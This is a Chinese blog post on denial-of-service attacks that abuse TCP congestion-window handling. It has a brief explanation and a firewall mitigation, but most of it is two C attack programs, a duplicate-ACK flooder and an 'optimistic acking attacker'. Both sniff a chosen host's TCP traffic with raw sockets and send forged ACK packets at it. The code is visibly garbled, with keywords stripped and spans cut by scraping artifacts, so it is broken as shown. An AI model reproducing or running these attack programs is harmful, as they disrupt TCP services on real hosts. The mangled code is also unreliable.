密码算法与协议:TCP协议堵塞窗口算法攻击

on 2009-9-12 in 安全 | 0 Comment
TCP 协议层次有关 堵塞窗口 算法 存在容易受攻击漏洞
这种攻击是基于协议层次因此任何实现tcp 系统都会受到影响

危害性:

通过制造堵塞能够使受攻击主机不能和任何指定主机进行正常tcp 层次数据传输这类攻击后果将是使所有TCP服务(包括web、mail、FTP等)都会产生拒绝服务

攻击思路方法有两到 3种没有任何补丁可以用来防止这种攻击除非在防火墙设置防范 或者更改TCP协议头部结构.


理论基础: 什么是ACK_SEQ

ACK_SEQ 标志数据包被正确接受了

ACK_SEQ 是接受数据包SEQ 和 接受数据包净荷长度.

由于push 标志位存在可以任意指定seq 大小.

--- 攻击原理 ---

1重复发送 数据包任何ip 数据包都有可能被重复发送到同个接受端
通过构造重复tcp 数据包每个数据包拥有区别ACK ,能够造成数据窗口堵塞.

2) 预先判断发送方数据长度在数据没有真正到达接受方的前开始发送返回ACK 数据包从而造成堵塞



解决方案:
在防火墙端进行设置对非紧急数据类型数据比如TELNET 以外普通TCP 连接检查是否存在push 标志进行过滤


攻击思路方法:
1重复发送 数据包任何ip 数据包都有可能被重复发送到同个接受端
通过构造重复tcp 数据包每个数据包拥有区别ACK ,能够造成数据窗口堵塞.
攻击代码
############################

# <stdio.h>
# <unistd.h>
# <stdlib.h>
# <.h>
# <errno.h>
# <err.h>

# <sys/.h>
# <sys/ioctl.h>
# <arpa/inet.h>
# <net/.h>
# <net/_arp.h>
# <netinet/in.h>
# <netinet/ip.h>
# <netinet/tcp.h>

# <linux/_ether.h>
# <linux/_packet.h>

extern errno;
struct sockaddr_in sin;
ss;

void send_dupack(void *, unsigned char);

# MAS 128 /* Max Ack Size */
/*
# BOLD "\033[1;1m"
# N "\033[0m"
*/
( argc, char **argv)
{
struct req r; /* erface query struct */
sfd, nt, nd, off, hdr =1; /* , number time to apply dup,
* number of dup, datalink off */
unsigned daddr; /* dest addr to check */
unsigned port; /* dest port to check */

prf( " ldaa - "
/*BOLD*/ "lamer dup ack attacker" /*N*/
" - by [email protected]\n");

(argc != 6)
{
fprf(stderr,
" usage: %s host port ace n.dup n.times\n" \
" %s:\tis ldaa this program ...\n" \
" host:\t\thost to attack, _disibledevent=> nd =atoi(argv[4]);
daddr =inet_addr(argv[1]);
port =htons(atoi(argv[2]));

sin.sin_port =port;
sin.sin_addr.s_addr =daddr;
sin.sin_family =AF_INET;

((sfd =(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) -1)
err(errno, " _disibledevent=> err(errno, " _disibledevent=> err(errno, "sockopt IP_HDRINCL");

strncpy(r.r_name, argv[3], (r.r_name));

(ioctl(sfd, SIOCGIFHWADDR, &r) -1)
err(errno, "ioctl SIOCGIFHWADDR of %s", argv[3]);

switch(r.r_hwaddr.sa_family)
{
ARPHRD_ETHER:
ARPHRD_METRICOM:
ARPHRD_EETHER:
off =14;
;
ARPHRD_PPP:
off =0;
;
ARPHRD_LOOPBACK:
off =4;
;
default:
err(ENODEV, "unknow linktype for device %s", argv[3]);
}

while(nt)
{
char packet[MAS];
unsigned ack_seq;
struct iphdr *ip;
struct tcphdr *tcp;
n;

((n =read(sfd, &packet, MAS)) -1)
err(errno, "read _disibledevent=>
(ip->protocol != IPPROTO_TCP || ip->daddr !=daddr)
continue;

(char *)tcp =(char *)ip +(struct iphdr);

(tcp->dest !=port)
continue;

// (tcp->ack && !tcp->syn && !tcp->rst && tcp->ack_seq !=ack_seq)
(1) {
cnt;

prf(" dup seq %u ack %u\n", tcp->seq, tcp->ack_seq);
for(cnt =0; cnt !=nd; cnt)
{
prf(" cnt %d nd %d nt %d\n", cnt, nd, nt);
send_dupack((void *)ip, ntohs(ip->tot_len));
}

nt--;
ack_seq =tcp->ack_seq;
}
}

exit(EXIT_SUCCESS);
}

void send_dupack(void *pkt, unsigned char len)
{
(sendto(ss, pkt, len, 0x0000, &sin, (sin)) -1)
err(errno, "error _disibledevent=>数据长度在数据没有真正到达接受方的前开始发送返回ACK 数据包从而造成堵塞.

攻击代码
##########

# <stdio.h>
# <unistd.h>
# <stdlib.h>
# <.h>
# <errno.h>
# <err.h>

# <sys/.h>
# <sys/ioctl.h>
# <arpa/inet.h>
# <net/.h>
# <net/_arp.h>
# <netinet/in.h>
# <netinet/ip.h>
# <netinet/tcp.h>

# <linux/_ether.h>
# <linux/_packet.h>

extern errno;

struct sockaddr_in sin;
unsigned l_ack;
ss, ns;

unsigned sum(unsigned *, );
void ssoa(void *, struct tcphdr *, size_t, );

# MAS 128 /* Max Ack Size */

( argc, char **argv)
{
struct req r; /* erface query struct */
sfd, off, wa, hdr =1; /* , number time to apply dup,
* number of dup, datalink off */
unsigned daddr; /* dest addr to check */
unsigned port; /* dest port to check */

prf(" optimistic acking attacker - by [email protected]\n\n");

(argc != 6)
{
fprf(stderr,
" usage: %s host port ace n.spoof n.wait\n" \
" host:\thost to attack, _disibledevent=> port =htons(atoi(argv[2]));
ns =atoi(argv[4]);
wa =atoi(argv[5]);

sin.sin_port =port;
sin.sin_addr.s_addr =daddr;
sin.sin_family =AF_INET;

((sfd =(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) -1)
err(errno, " _disibledevent=> err(errno, " _disibledevent=> err(errno, "sockopt IP_HDRINCL");

strncpy(r.r_name, argv[3], (r.r_name));

(ioctl(sfd, SIOCGIFHWADDR, &r) -1)
err(errno, "ioctl SIOCGIFHWADDR of %s", argv[3]);

switch(r.r_hwaddr.sa_family)
{
ARPHRD_ETHER:
ARPHRD_METRICOM:
ARPHRD_EETHER:
off =14;
;
ARPHRD_PPP:
off =0;
;
ARPHRD_LOOPBACK:
off =4;
;
default:
err(ENODEV, "unknow linktype for device %s", argv[3]);
}

prf(" reading packet len...\n");

while(1)
{
char packet[MAS];
struct iphdr *ip;
struct tcphdr *tcp;
inc, i;
n;

((n =read(sfd, &packet, MAS)) -1)
err(errno, "read _disibledevent=>
(ip->protocol !=IPPROTO_TCP || ip->daddr !=daddr)
continue;

(char *)tcp =(char *)ip +(struct iphdr);

(tcp->dest !=port)
continue;

(tcp->ack && !tcp->syn && !tcp->rst)
{
chk =ntohl(tcp->ack_seq) -ntohl(l_ack);

(!l_ack)
{
l_ack =tcp->ack_seq;
continue;
}

(!chk)
continue;

prf(" %u", chk);

(chk inc)
{
(i wa)
ssoa(ip, tcp, ntohs(ip->tot_len), inc);
}

{
prf("\n %d packet's size check after %d "
"re for %d \n" ,inc, i +1, chk);
inc =chk;
i =0x0000;
}

l_ack =tcp->ack_seq;
}
}
}

void ssoa(void *pkt, struct tcphdr *x, size_t len, size)
{
k =0x0000;

prf("\n guessed packets len [%d]\n sending ACKs: ", size);

while(k != ns)
{
x->ack_seq htonl(size* k);
x->check =sum((unsigned *)x, (struct tcphdr));

prf(".");

(sendto(ss, pkt, len, 0x0000, &sin, (sin)) -1)
err(errno, "error _disibledevent=>
while(nw > 0)
{
ret *hdr;
nw -= 2;
}

ret = (ret >> 16) + (ret & 0xffff);
ret (ret >> 16);

~(ret);
}





  • 篇文章: OpenSSH 溢出攻击思路方法

  • 篇文章: 常见IP碎片攻击详解
    • Tags:  tcpip协议详解 tcp协议 tcpip协议 密码算法与协议

    延伸阅读

    最新评论

    发表评论